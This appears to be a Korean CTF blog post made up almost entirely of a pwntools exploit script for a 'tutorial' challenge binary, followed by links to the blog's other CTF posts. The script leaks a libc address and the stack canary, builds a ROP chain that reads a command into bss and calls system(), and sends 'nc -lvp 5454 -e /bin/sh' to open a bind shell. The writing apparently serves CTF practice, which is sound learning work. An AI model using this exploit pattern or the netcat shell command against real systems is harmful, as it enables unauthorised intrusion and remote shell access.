문제를 풀기위한 제약 조건이 많아서 ida로 그 조건을 찾아서 맞춰 줘야 바이너리가 정상적으로 실행됨.
from pwn import *
r = remote("localhost", 9797)
libc_elf = ELF("./libc-2.19.so")
elf = ELF("./tutorial")
read_plt = elf.plt['read']
read_got = elf.got['read']
write_plt = elf.plt['write']
write_got = elf.got['write']
bss = elf.bss()
cmd = "nc -lvp 5454 -e /bin/sh\x00"
r.sendlineafter(">", "1")
r.recvuntil("Reference:")
libc_puts = int(r.recv(14), 16) + 1280
libc_system = libc_puts - 0x2a300
log.info("libc_puts = {}".format(hex(libc_puts)))
log.info("libc_system = {}".format(hex(libc_system)))
pop_rdi = libc_puts + 0x12e515
pop_rsi = libc_puts + 0xcd587
pop_rdx = libc_puts - 0x6dafe
r.sendlineafter(">", "2")
payload = "A"*311
r.sendlineafter("Time to test your exploit...", payload)
r.recvuntil("A\x0a")
canary = u64(r.recv(8))
log.info("canary = {}".format(hex(canary)))
print r.sendlineafter(">", "2")
payload = "\x90"*312
payload += p64(canary)
payload += "\x90"*8
payload += p64(pop_rdi)
payload += p64(4)
payload += p64(pop_rsi)
payload += p64(bss)
payload += p64(pop_rdx)
payload += p64(30)
payload += p64(read_plt)
payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(libc_system)
pause()
r.sendlineafter(">", payload)
pause()
r.sendline(cmd)
'CTF' 카테고리의 다른 글
| plaid 2019 can you guess me? (0) | 2019.04.15 |
|---|---|
| codegate2019 aeiou (0) | 2019.02.23 |
| TJCTF 2016 oneshot (0) | 2019.01.24 |
| QIWICTF 2016 pwn200 (0) | 2019.01.23 |
| SEC-T CTF PingPong (0) | 2018.09.16 |